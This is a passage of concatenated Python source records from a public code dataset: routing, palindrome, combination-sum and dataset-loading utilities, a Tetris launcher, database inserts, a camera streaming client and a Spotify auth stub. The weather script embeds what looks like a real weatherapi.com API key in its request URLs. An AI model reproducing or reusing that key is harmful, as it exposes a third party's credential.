timerange is None:\n        timerange = timeBount[source]\n    v = 50\n    cost = adj[source][target] / v\n    left = [0, 0]\n    if timerange[0] + cost > timeBount[target][1]:\n        return [-1, []]\n    else:\n        left[0] = max(timerange[0] + cost + timeReload[target],\n                      timeBount[target][0])\n    if timerange[1] + cost < timeBount[target][0]:\n        return [-1, []]\n    else:\n        left[1] = min(timerange[1] + cost + timeReload[target],\n                      timeBount[target][1])\n    return [adj[source][target], left]\n\n\n
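seq_time below scores every visiting order with itertools.permutations; stripped of the time-window bookkeeping, the core pattern looks like this (the small distance matrix and node set are made up for illustration):

from itertools import permutations

def brute_force_tour(dist, nodes, depot=0):
    best_cost, best_order = float('inf'), None
    for order in permutations(nodes):
        tour = (depot, *order, depot)  # start and end at the depot
        cost = sum(dist[a][b] for a, b in zip(tour, tour[1:]))
        if cost < best_cost:
            best_cost, best_order = cost, order
    return best_cost, best_order

# dist = [[0, 4, 9], [4, 0, 6], [9, 6, 0]]
# brute_force_tour(dist, [1, 2])  ->  (19, (1, 2))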
def seq_time(choice):\n    res = dict()\n    for seq in itertools.permutations(choice):\n        distance = 0\n        trange = [0, 24]\n        flag = 1\n        cir = list(seq)\n        cir.insert(0, 0)\n        cir.append(0)\n        for i in range(len(cir) - 1):\n            d, t = isTimeOk(cir[i], cir[i+1], trange)\n            if d == -1:\n                flag = 0\n                break\n            else:\n                distance += d\n                trange = t\n        if flag:\n            res[seq] = distance\n    return res\n\n\ndef isOverWeight(choice, weight=8):\n    \"\"\"Return True if the total demand of all customers in this choice exceeds ``weight``.\"\"\"\n\n    weight_demand = [0, 2, 1.5, 4.5, 3, 1.5, 4, 2.5, 3]  # q\n    total = 0\n    for i in choice:\n        total += weight_demand[i]\n    return total > weight\n\n\ndef single_car(clients):\n    \"\"\"There is a universal set: no matter how many vehicles there are, every vehicle's delivery plan belongs to it.\n\n    Elements of this set must satisfy two conditions:\n    1. The delivered weight does not exceed the vehicle capacity.\n    2. All customers are reached on time.\n    \"\"\"\n    choices = [[]]\n    for client in clients:\n        new_choices = []\n        for choice in choices:\n            new_choice = [client]\n            new_choice.extend(choice)\n            if not isOverWeight(new_choice):\n                new_choices.append(new_choice)\n        choices.extend(new_choices)\n    choices.remove([])\n    return choices\n\n\ndef list2set(orig):\n    res = set()\n    for ele in orig:\n        if isinstance(ele, list):\n            res.update(list2set(ele))\n        else:\n            res.add(ele)\n    return res\n\n\ndef multi_car(choices):\n    \"\"\"calculate solutions of optional cars for choices sequence\"\"\"\n    solutions = [[]]\n    ok = []\n    for choice in choices:\n        new_solutions = []\n        for solution in solutions:\n            # drop if node repeated\n            if len(list2set(choice) & list2set(solution)) == 0:\n                new_solution = [choice]\n                new_solution.extend(solution)\n                if len(list2set(new_solution)) == 8:\n                    ok.append(new_solution)\n                else:\n                    new_solutions.append(new_solution)\n        solutions.extend(new_solutions)\n    return ok\n","repo_name":"vivian-xu/snipmate","sub_path":"tspWithTime/tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27042729887","text":"def is_palindrome(phrase):\n    \"\"\"Is phrase a palindrome?\n\n    Return True/False if phrase is a palindrome (same read backwards and\n    forwards).\n\n    >>> is_palindrome('tacocat')\n    True\n\n    >>> is_palindrome('noon')\n    True\n\n    >>> is_palindrome('robert')\n    False\n\n    Should ignore capitalization/spaces when deciding:\n\n    >>> is_palindrome('taco cat')\n    True\n\n    >>> is_palindrome('Noon')\n    True\n    \"\"\"\n    lower_phrase = phrase.lower()\n    letters = \"abcdefghijklmnopqrstuvwxyz\"\n    listofpharase = [letter.lower()\n                     for letter in lower_phrase if letter in letters]\n    list_reverse = listofpharase.copy()\n    list_reverse.reverse()\n\n    if (listofpharase == list_reverse):\n        return True\n    else:\n        return False\n","repo_name":"JoeUnedu/Python-DS-Exercise","sub_path":"python-ds-practice/09_is_palindrome/is_palindrome.py","file_name":"is_palindrome.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1256580962","text":"import requests\n\nurl1 = 'http://api.weatherapi.com/v1/current.json?key=4cd5672383814ae0932211421231209&q=Wroclaw&aqi=no'\n\nmiasto = 'Berlin'\n\nurl2 = 'http://api.weatherapi.com/v1/current.json?key=4cd5672383814ae0932211421231209&q='+ miasto + '&aqi=no'\nresponse_var1 = requests.get(url2)\njson_var1 = response_var1.json()\n\n# print(json_var1)\n\ntemp_c = json_var1.get('current').get('temp_c')\nprint(temp_c)\n\naura = json_var1.get('current').get('condition').get('text')\nprint(aura)\n\n
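The same lookup can be written more defensively; a hedged sketch against the endpoint used above, with a timeout and HTTP error handling added (the key and city are placeholders):

import requests

def current_weather(city, api_key):
    url = 'http://api.weatherapi.com/v1/current.json'
    resp = requests.get(url, params={'key': api_key, 'q': city, 'aqi': 'no'}, timeout=10)
    resp.raise_for_status()                      # fail loudly on HTTP errors
    current = resp.json()['current']
    return current['temp_c'], current['condition']['text']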
print('Current weather in', miasto, 'is:', aura, \". And we have a temperature of\", temp_c, 'degrees Celsius')\n\n#for ips in json_var1['current']:\n#    print(f\"the current temperature is: {ips['temp_c']}\")\n#    print(f\"the current weather is: {ips['condition']}\")","repo_name":"konradpawlak/plurarFund","sub_path":"pyPogoda/pogoda.py","file_name":"pogoda.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5230157539","text":"#Problem Link https://leetcode.com/problems/combination-sum/\n# Time complexity 2^n\nclass Solution:\n    def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n        final = []\n        dp = []\n        self.findCombinations(candidates, target, 0, dp, final)\n        return final\n\n\n\n    def findCombinations(self, a, target, index = 0, dp = [], final = []):\n        if target < 0:\n            return\n        if index >= len(a):\n            if target == 0:\n                final.append(dp[:])\n            return\n\n        #take the current element\n        dp.append(a[index])\n        self.findCombinations(a,target-a[index], index, dp, final)\n\n        #Dont take the current element and move forward\n        dp.pop()\n        self.findCombinations(a, target, index+1, dp, final)","repo_name":"ayushj95123/90DaysOfDSA","sub_path":"Recursion/CombinationSum.py","file_name":"CombinationSum.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9653980778","text":"# coding=utf-8\n\nimport sys\nimport random\nimport argparse\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nfrom main import Tetris\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--value_of_speed', default='300')\n\n\nclass UI(QMainWindow):\n    def __init__(self, speed):\n        super().__init__()\n        self.speed = speed\n\n        self.initUI()  # edit the UI, using this function named initUI\n\n    def initUI(self):\n        # set the typeface\n        QToolTip.setFont(QFont('SansSerif', 10))\n\n        # tip for blank area\n        self.setToolTip('This is a Tetris game')\n\n        # play\n        self.start = QPushButton('start', self)\n        self.start.setToolTip('start the tetris game!')\n        self.start.setGeometry(140, 150, 300, 20)\n\n        # for child windows of start\n        layout = QVBoxLayout()\n        layout.addWidget(self.start)\n        self.setLayout(layout)\n\n        # set window size\n        self.resize(600, 440)\n        self.setWindowTitle('Tetris')\n        # set the icon of this window, using the picture named tetris.jpg in this project.\n        self.setWindowIcon(QIcon('tetris.jpg'))\n        self.center()\n\n        # show this window automatically\n        self.show()\n\n    # override this function: show a confirmation window asking whether the user really wants to exit the game\n    def closeEvent(self, event):\n\n        reply = QMessageBox.question(self, 'Message',\n                                     \"Are you sure to quit?\", QMessageBox.Yes |\n                                     QMessageBox.No, QMessageBox.No)\n\n        if reply == QMessageBox.Yes:\n            event.accept()\n        else:\n            event.ignore()\n\n    # center the window\n    def center(self):\n\n        # catch the window\n        qr = self.frameGeometry()\n        # get the center point\n        cp = QDesktopWidget().availableGeometry().center()\n        # print\n        qr.moveCenter(cp)\n        self.move(qr.topLeft())\n\n\nif __name__ == '__main__':\n    from AI_agent import TETRIS_AI\n    args = parser.parse_args()\n    # show windows, and create a correlation between these windows\n    print(\"would you like to play this Tetris game? Type '1' or '0' please.\")\n    choice = input()\n    if choice == '1':\n        print(\"would you like to watch AI playing? 
Type '1' or '0' please.\")\n watch = input()\n if watch == '1':\n ai = TETRIS_AI\n speed = 20\n else:\n ai = None\n speed = int(args.value_of_speed)\n app = QApplication(sys.argv)\n new = Tetris(speed, ai)\n ex = UI(speed)\n ex.start.clicked.connect(new.show)\n sys.exit(app.exec_())\n else:\n print(\"goodbye!\")\n","repo_name":"Uranussss/Retro_Game","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31805278051","text":"import os\nfrom queue import Queue\n\nimport pandas as pd\n\nfrom nltk.corpus import wordnet as wn\n\nimport networkx as nx\nfrom networkx.drawing.nx_pydot import graphviz_layout\n\nimport matplotlib.pyplot as plt\n\nIMAGENET_16_120 = False # for the 16-120 labels only\nDEBUG = 0\n\nwith open('imagenet_resized.labels', 'r') as f:\n labels = f.read().splitlines()\n\nif IMAGENET_16_120:\n labels = labels[:120]\nif DEBUG:\n labels = labels[:15]\n\n\ndef hyp(s):\n return s.hypernyms()\n\n\nedges = []\nleaves = []\n\nprint('put together graph')\nfor label in labels:\n pos = label[0]\n offset = int(label[1:])\n\n s = wn.synset_from_pos_and_offset(pos, offset)\n tree = s.tree(hyp)\n\n leaves.append(tree[0])\n\n q = Queue()\n q.put(tree)\n while not q.empty():\n line = q.get()\n child, parents = line[0], line[1:]\n for p in parents:\n edges.append((p[0].name(), child.name()))\n q.put(p)\n\ng = nx.DiGraph(edges)\n\nleaf_names = {leaf.name() for leaf in leaves}\ng_leaves = set(n for n in g.nodes() if g.out_degree(n) == 0)\nprint('This should be empty (non-leaf labels):',\n g_leaves ^ leaf_names)\n\n# stats: shortest distances between labels\ng_hash = nx.weisfeiler_lehman_graph_hash(g)\nprefix = 'imagenet_resized'\nif IMAGENET_16_120:\n prefix += '_120'\ndist_filename = f'{prefix}_label_distances_{g_hash}.csv'\n\nif os.path.isfile(dist_filename):\n print('read cached df')\n dist_df = pd.read_csv(dist_filename)\nelse:\n print('measure similarities')\n distances = []\n g_undirected = g.to_undirected()\n idx_is = [] # always less than j\n idx_js = []\n for i, leaf_i in enumerate(leaves):\n for leaf_j in leaves[i + 1:]:\n length = nx.shortest_path_length(g_undirected, leaf_i.name(),\n leaf_j.name())\n distances.append({\n 'label_i': leaf_i.name(),\n 'label_j': leaf_j.name(),\n 'nx_distance': length,\n 'path_sim': leaf_i.path_similarity(leaf_j),\n 'lch_sim': leaf_i.lch_similarity(leaf_j),\n 'wup_sim': leaf_i.wup_similarity(leaf_j),\n })\n idx_is.append(labels.index(\n leaf_i.pos() + f'{leaf_i.offset():08}'))\n idx_js.append(labels.index(\n leaf_j.pos() + f'{leaf_j.offset():08}'))\n\n mi = pd.MultiIndex.from_arrays([idx_is, idx_js], names=['idx_i', 'idx_j'])\n dist_df = pd.DataFrame(distances, index=mi)\n dist_df.to_csv(dist_filename, index=True)\n\nprint('sort')\ndist_df.sort_values(by='nx_distance', ignore_index=True, inplace=True)\nprint('ok printing')\nprint(dist_df.head(25).to_string(index=False))\nprint('...')\nprint(dist_df.tail(25).to_string(index=False))\nprint('Pearson Correlation')\nprint(dist_df.corr().to_string())\nprint('Spearman Correlation')\nprint(dist_df.corr('spearman').to_string())\n\npos = graphviz_layout(g, prog='twopi')\n\nnon_leaf = {*g.nodes()} - leaf_names\nnx.draw_networkx_nodes(g, pos, nodelist=leaf_names, node_shape='^',\n node_size=25, node_color='g')\nnx.draw_networkx_nodes(g, pos, nodelist=non_leaf, node_shape='o',\n node_size=25, node_color='b')\nnx.draw_networkx_edges(g, pos)\nnx.draw_networkx_labels(g, pos, 
verticalalignment='center',\n horizontalalignment='right',\n font_size=8)\n\nplt.show()\n","repo_name":"LLNL/XNAS","sub_path":"hierarchical_imagenet.py","file_name":"hierarchical_imagenet.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"23778207","text":"import numpy as np\nimport cv2, random\n\nfrom os.path import join\n\n\nclass WiderFaceDataset:\n def __init__(self, data_dir):\n self.data_dir = data_dir\n\n self._train_ls = self.load_file(\"wider_face_train_bbx_gt.txt\")\n self._val_ls = self.load_file(\"wider_face_val_bbx_gt.txt\")\n self._test_ls = self.load_file(\"wider_face_test_filelist.txt\")\n\n def load_file(self, file_name):\n result = []\n\n file_path = join(self.data_dir, \"wider_face_split\", file_name)\n if file_name == \"wider_face_test_filelist.txt\":\n return [line.strip() for line in open(file_path, \"r\").readlines()]\n\n with open(file_path, \"r\") as f:\n status = 0\n for line in f.readlines():\n line = line.strip()\n if status == 0:\n record = [line, []]\n status = 1\n continue\n\n if status == 1:\n count = int(line)\n status = 2\n continue\n\n if status == 2:\n record[1].append([int(s) for s in line.split(\" \")])\n count -= 1\n if count <= 0:\n result.append(record)\n status = 0\n continue\n\n return result\n\n def load_image(self, image_path):\n return cv2.imread(join(self.data_dir, image_path))\n\n def preprocess(self, img, rois):\n h, w, _ = img.shape\n scale = min(1024 / h, 1024 / w)\n img = cv2.resize(img, None, fx=scale, fy=scale)\n rois = rois * scale\n\n h, w, _ = img.shape\n canvas = np.zeros((1024, 1024, 3))\n canvas[:h, :w, :] = img\n\n return canvas, rois.astype(np.int)\n\n def train_data(self):\n random.shuffle(self._train_ls)\n for image_name, data in self._train_ls:\n image_path = join(\"WIDER_train\", \"images\", image_name)\n img = self.load_image(image_path)\n rois = np.array(data)[:, :4]\n yield self.preprocess(img, rois)\n\n def val_data(self):\n for image_name, data in self._val_ls:\n image_path = join(\"WIDER_val\", \"images\", image_name)\n img = self.load_image(image_path)\n rois = np.array(data)[:, :4]\n yield self.preprocess(img, rois)\n\n def test_data(self):\n for image_name, data in self._test_ls:\n image_path = join(\"WIDER_test\", \"images\", image_name)\n yield self.load_image(image_path)\n\n\nif __name__ == '__main__':\n dataset = WiderFaceDataset(\"/home/killf/data/数据集/wider_face\")\n for img, rois in dataset.train_data():\n for roi in rois:\n cv2.rectangle(img, (roi[0], roi[1]), (roi[0] + roi[2], roi[1] + roi[3]), (255, 255, 0))\n cv2.imwrite(\"0.jpg\", img)\n\n print(dataset)\n","repo_name":"killf/FaceDetection","sub_path":"dataset/wider_face.py","file_name":"wider_face.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70842538396","text":"import sys\nimport logging\n\nimport sqlalchemy as db\n\nimport settings\n\nfrom sqlalchemy import exc\nfrom sqlalchemy.types import Integer\nfrom sqlalchemy.types import Boolean\nfrom sqlalchemy.types import String\n\ndef conectar():\n \"\"\"\n Se encarga de realizar la conexión a la base de datos\n Inputs:\n None\n Ouput:\n Conexión a la BD\n \"\"\"\n usuario = settings.DATABASES['default']['USER']\n contrasena = settings.DATABASES['default']['PASSWORD']\n host = settings.DATABASES['default']['HOST']\n db_nombre = settings.DATABASES['default']['NAME']\n engine = 
db.create_engine('postgresql+psycopg2://'+ usuario +':' + contrasena + '@' + host +'/' + db_nombre)\n    return engine\n\n# Not much to document here\n# Connect\n# Normalise the data types\n# Fix the indices\ndef insertar_estadisticas_general(dataframe):\n    \"\"\"\n    Inserts the normalised dataframe into the database\n    Inputs:\n        Normalised dataframe\n    Output:\n        None\n    \"\"\"\n    engine = conectar()\n    try:\n        dataframe.to_sql(\n            'estadisticas_general',\n            con=engine,\n            if_exists='replace',\n            index = False,\n            dtype=\n            {\n                'descripcion':String(),\n                'cantidad':Integer()\n            }\n        )\n    except exc.SQLAlchemyError:\n        logging.error('Error connecting to the database')\n        sys.exit('Failed to connect to the database')\n\ndef insertar_estadisticas_cines(dataframe):\n    \"\"\"\n    Inserts the cinema-statistics dataframe into the database\n    Inputs:\n        Dataframe with cinema statistics\n    Output:\n        None\n    \"\"\"\n    engine = conectar()\n    try:\n        dataframe.to_sql(\n            'estadisticas_cines',\n            con=engine,\n            if_exists='replace',\n            dtype=\n            {\n                'provincia':String(),\n                'pantallas':Integer(),\n                'butacas':Integer(),\n                'cantidad_de_espacios_INCAA':Integer()\n            }\n        )\n    except exc.SQLAlchemyError:\n        logging.error('Error connecting to the database')\n        sys.exit('Failed to connect to the database')\n\ndef insertar_datos_normalizados(dataframe):\n    \"\"\"\n    Inserts the general-statistics dataframe into the database\n    Inputs:\n        Dataframe with general statistics\n    Output:\n        None\n    \"\"\"\n    engine = conectar()\n    try:\n        dataframe.to_sql(\n            'locaciones',\n            con=engine,\n            if_exists='replace',\n            dtype=\n            {\n                'id_provincia':Integer(),\n                'cod_localidad':Integer(),\n                'provincia':String(),\n                'localidad':String(),\n                'nombre':String(),\n                'domicilio':String(),\n                'codigo_postal':String(),\n                'mail':String(),\n                'web':String(),\n                'fuente':String(),\n                'telefono':String(),\n                'id_departamento':Integer(),\n                'categoria':String()\n            }\n        )\n    except exc.SQLAlchemyError:\n        logging.error('Error connecting to the database')\n        sys.exit('Failed to connect to the database')","repo_name":"hectornauta/DataCulture","sub_path":"conexion_db.py","file_name":"conexion_db.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"36084126625","text":"class NameEntry:\r\n    def __init__(self,name,gender,count):\r\n        self.name = name\r\n        self.gender = gender\r\n        self.count = count\r\n        \r\nclass YearEntry:\r\n    def __init__(self,names):\r\n        self.entries = []\r\n        for name_entry in names:\r\n            self.add(name_entry)\r\n    \r\n    def add(self,name_entry):\r\n        self.entries.append(name_entry)\r\n\r\ndef loadFileData(f):\r\n    year_entry = YearEntry([]) # YearEntry() needs an argument so blank space for now\r\n    lines = [line.strip() for line in f] # Strip whitespace from lines in file\r\n    for line in lines:\r\n        name,gender,count = line.split(',') # Split lines into name,gender,count\r\n        ne = NameEntry(name,gender,int(count)) # name entry\r\n        year_entry.add(ne)\r\n    return year_entry\r\n\r\ndef loadAllData():\r\n    start_year,finish_year = 1880,2016\r\n    yr_data = dict()\r\n    for yr in range(start_year,finish_year):\r\n        path = 'D:\\\\names\\\\'\r\n        filename = 'yob{}.txt'.format(yr)\r\n        with open(path+filename,'r') as f:\r\n            yr_data[yr] = loadFileData(f)\r\n    return yr_data\r\n    \r\n    
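Once loadAllData has run, the per-year entries reduce naturally to a time series. A small sketch assuming the classes above (the helper name and query values are illustrative):

def counts_for_name(yr_data, wanted, gender):
    series = {}
    for yr, year_entry in yr_data.items():
        # Sum all entries matching the requested name and gender for that year.
        series[yr] = sum(e.count for e in year_entry.entries
                         if e.name == wanted and e.gender == gender)
    return series

# series = counts_for_name(loadAllData(), 'Mary', 'F')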
","repo_name":"tangentino/Intro-Python","sub_path":"data_term1.py","file_name":"data_term1.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25271932562","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nfrom decimal import Decimal, getcontext\nimport logging\nfrom load_logger import load_logger_conf\nfrom PIL import Image\nimport glob\nimport os\nimport sys\nimport time\nfrom generate_samples import save_plot\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nSEED = 12345\n\n#loads n number of samples form mnist with 80/20 split\ndef load_mist(n, fashion=False):\n if fashion:\n (train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.fashion_mnist.load_data()\n else:\n (train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()\n x = np.concatenate((train_images, test_images))\n y = np.concatenate((train_labels, test_labels))\n x = x.reshape((x.shape[0], 28, 28, 1)).astype('float32')\n y = y.reshape(y.shape[0], 1).astype('float32')\n\n gen_train_images = train_images.reshape((train_images.shape[0], 28, 28, 1)).astype('float32')\n gen_train_labels = train_labels.reshape(train_labels.shape[0], 1).astype('float32')\n gen_test_images = test_images.reshape((test_images.shape[0], 28, 28, 1)).astype('float32')\n gen_test_labels = test_labels.reshape(test_labels.shape[0], 1).astype('float32')\n # gan uses only training set vae also uses test set\n # train_size = 0.8\n # #use decimal since 1-0.8 is 0.199999999 due to float inprecision\n # getcontext().prec = 3\n # test_size = float(Decimal(1)-Decimal(train_size))\n if n < gen_train_images.shape[0]:\n gen_train_images, throwaway_images, gen_train_labels, throwaway_labels = train_test_split(gen_train_images, gen_train_labels, train_size=n, random_state=SEED, shuffle=True, stratify=gen_train_labels)\n # fetch only n elements so that len(train_images)+len(test_images) = n\n # train_n = int((n/100)*(train_size*100))\n # test_n = int((n/100.)*(test_size*100))\n gen_train_images = gen_train_images[:n]\n gen_train_labels = gen_train_labels[:n]\n\n # gen_test_images = gen_test_images[:test_n]\n # gen_test_labels = gen_test_labels[:test_n]\n # test_labels_onehot = np.zeros((test_labels.size, test_labels.max()+1))\n # test_labels_onehot[np.arange(test_labels.size), test_labels] = 1\n logging.info('Created train test split of {} train elements and {} test elements'.format(gen_train_images.shape[0], gen_test_images.shape[0]))\n\n # Normalization\n # for GAN\n gen_train_images_gan = (gen_train_images - 127.5) / 127.5\n gen_test_images_gan = (gen_test_images - 127.5) / 127.5\n\n # for VAE\n gen_train_images_vae = gen_train_images / 255.\n gen_test_images_vae = gen_test_images / 255.\n # for Classifier\n train_images_cl = gen_train_images / 255.\n test_images_cl = gen_test_images / 255.\n\n dataset = {}\n dataset['train_data_gan'] = [gen_train_images_gan, gen_train_labels]\n dataset['test_data_gan'] = [gen_test_images_gan, gen_test_labels]\n\n dataset['train_data_vae'] = [gen_train_images_vae, gen_train_labels]\n dataset['test_data_vae'] = [gen_test_images_vae, gen_test_labels]\n\n dataset['train_data_cl'] = [train_images_cl, onehot_encode(gen_train_labels)]\n dataset['test_data_cl'] = [test_images_cl, onehot_encode(gen_test_labels)]\n return dataset\n\ndef load_generated_imgs(img_path):\n 
image_list = []\n y = []\n for i in range(10):\n for filename in glob.glob(img_path+'label_{}/*.png'.format(i)):\n im=Image.open(filename)\n image_list.append(im.copy())\n im.close()\n y.append(i)\n x = np.array(list(map(np.asarray, image_list)))\n y = np.array(y)\n x = x.reshape((x.shape[0], 28, 28, 1)).astype('float32')\n y = y.reshape(y.shape[0], 1).astype('float32')\n # x, y = shuffle(x, y, random_state=SEED)\n # Normalization \n x /= 255.\n dataset = {}\n dataset['cl_train_data'] = [x, onehot_encode(y)]\n return dataset\n\ndef onehot_encode(labels, num_classes=10):\n labels = labels.astype(np.uint8)\n targets = np.array(labels).reshape(-1)\n labels_onehot = np.eye(num_classes)[targets]\n return labels_onehot\n\ndef load_classifier_data(train_dataset, test_dataset, img_path=None, gen=True, number_aug=None, imgs_paths=None):\n dataset = {}\n if gen:\n if img_path == None:\n # augmented data\n train_time, gen_time, augmented_data = mnist_augmented(train_dataset[0], train_dataset[1], number_aug, imgs_paths)\n generated_data = augmented_data\n else:\n # generated data\n generated_data = load_generated_imgs(img_path)\n x_train = np.concatenate((generated_data['cl_train_data'][0], train_dataset[0]))\n y_train = np.concatenate((generated_data['cl_train_data'][1], train_dataset[1]))\n x_test = test_dataset[0]\n y_test = test_dataset[1]\n dataset['cl_train_data'] = shuffle(x_train, y_train, random_state=SEED)\n dataset['cl_test_data'] = [x_test, y_test]\n else:\n x_train = train_dataset[0]\n y_train = train_dataset[1]\n x_test = test_dataset[0]\n y_test = test_dataset[1]\n dataset['cl_train_data'] = shuffle(x_train, y_train, random_state=SEED)\n dataset['cl_test_data'] = [x_test, y_test]\n if img_path == None and gen == True:\n return train_time, gen_time, dataset\n return dataset\n\ndef mnist_augmented(x_train, y_train, augment_size, imgs_paths):\n image_generator = ImageDataGenerator(\n rotation_range=10,\n zoom_range = 0.05, \n width_shift_range=0.05,\n height_shift_range=0.05,\n horizontal_flip=False,\n vertical_flip=False)\n # go through labels and generate for each label individually to preserve balance\n result_x = np.empty((0, 28, 28, 1))\n result_y = np.empty((0, 10))\n train_time = 0\n gen_time = 0\n for i in range(10):\n l = float(i)\n # print(l)\n lab = y_train\n # turn onehot encoded labels into numeric\n lab_numeric = np.array([np.where(r==1.)[0][0] for r in lab])\n ind = np.where(lab_numeric==l)\n print(len(ind[0]))\n sliced_x = np.copy(x_train[ind, ])\n sliced_y = np.copy(y_train[ind, ])\n sliced_x = sliced_x.reshape((sliced_x.shape[1], 28, 28, 1)).astype('float32')\n sliced_y = sliced_y.reshape((sliced_y.shape[1], 10)).astype('float32')\n # print('Sliced_x shape: {}'.format(sliced_x.shape))\n # print('Sliced_y shape: {}'.format(sliced_y.shape))\n # fit data for zca whitening\n train_time_start = time.time()\n image_generator.fit(sliced_x, augment=True, seed=SEED)\n train_time_end = time.time()\n train_time += (train_time_end-train_time_start)\n # get transformed images\n gen_time_start = time.time()\n randidx = np.random.randint(sliced_x.shape[0], size=augment_size)\n x_augmented = sliced_x[randidx].copy()\n y_augmented = sliced_y[randidx].copy()\n x_augmented = image_generator.flow(x_augmented, np.zeros(augment_size),\n batch_size=augment_size, shuffle=False).next()[0]\n imgs_path = imgs_paths[i]\n save_plot(x_augmented, 'AUG', imgs_path, i)\n gen_time_end = time.time()\n gen_time += (gen_time_end-gen_time_start)\n # print('x_augment shape: {}'.format(x_augmented.shape))\n # 
print('y_augment shape: {}'.format(y_augmented.shape))\n        #display_image_from_array(x_augmented[0])\n        result_x = np.concatenate((result_x, x_augmented))\n        result_y = np.concatenate((result_y, y_augmented))\n    # print('Result_x array shape: {}'.format(result_x.shape))\n    # print('Result_y array shape: {}'.format(result_y.shape))\n    dataset = {}\n    dataset['cl_train_data'] = [result_x, result_y]\n    return train_time, gen_time, dataset\n\ndef display_image_from_array(arr):\n    img = Image.fromarray((arr*255).reshape((28,28)).astype(np.uint8))\n    img.show()\n\nif __name__ == \"__main__\":\n    # img_path = './runs/run_1/cycles/cycle_1/vae_imgs/'\n    # load_generated_imgs(img_path)\n    #mnist_augmented()\n    load_mist(25600, fashion=False)\n    ","repo_name":"chineduobadigbo/data_aug_comparison","sub_path":"load_mnist.py","file_name":"load_mnist.py","file_ext":"py","file_size_in_byte":8219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"29306991742","text":"import cv2\nfrom config_utils import Config\nfrom socket_client import Client\nfrom json import loads\nfrom random import randint\n\nconfig = Config()\nvideo_server_host, video_server_port = config.get_video_server_config()\ndata_center_host, data_center_port = config.get_data_center_config()\n\ncamera_host = config.get_value(\"camera_host\")\n\nimage_quality = config.get_value(\"image_quality\")\n\nclient_of_data_center = Client(data_center_host, data_center_port)\nclient_of_data_center.connect()\nclient_of_video_server = Client(video_server_host, video_server_port)\nclient_of_video_server.connect()\n\n\ndef capture(camera_id, camera_host, image_quality):\n    if camera_host == \"0\":\n        camera_host = 0\n    cap = cv2.VideoCapture(camera_host)\n    while True:\n        ret, frame = cap.read()\n        encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), image_quality]\n        image = cv2.imencode('.jpg', frame, encode_param)[1]\n        image_byte = image.tobytes()\n        client_of_video_server.send_to_video_server(camera_id, 50, image_byte)\n\n\nif __name__ == \"__main__\":\n    register = {\n        \"data_type\": 50,\n        \"camera_host\": camera_host\n    }\n    client_of_data_center.send_to_data_center(register)\n    message_bytes = client_of_data_center.conn.recv(1024)\n    message_str = message_bytes.decode()\n    message_json = loads(message_str)\n    use_mysql = message_json[\"use_mysql\"]\n    if use_mysql:\n        camera_id = message_json[\"camera_id\"]\n        text = \"Surveillance camera registered with the data center; current device ID: {}\"\n    else:\n        camera_id = randint(65535, 70000)\n        text = \"The data center is not connected to MySQL, so the device cannot obtain a proper ID; temporary ID {} has been assigned to the camera for testing\"\n    print(text.format(camera_id, camera_host))\n    capture(camera_id, camera_host, image_quality)\n","repo_name":"kanyuanzhi/TouchAll-VideoCapture","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10641485241","text":"import webbrowser\nimport secrets, hashlib, base64\nimport urllib.parse, urllib.error\nimport json, web\nimport os.path, shelve, tempfile\nimport time\n\nCLIENT_ID = '46e6abb3cb0448ee88ae176a5b2d9c4b'\nPORT = 8080\n\nasync def auth():\n    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_.-~'\n    verifier = ''.join(secrets.choice(chars) for _ in range(64))\n    challenge = base64.urlsafe_b64encode(hashlib.sha256(verifier.encode()).digest())\n    challenge = challenge.decode().rstrip('=')\n\n    query = urllib.parse.urlencode({\n        'client_id': CLIENT_ID,\n        'response_type': 'code',\n        'redirect_uri': 
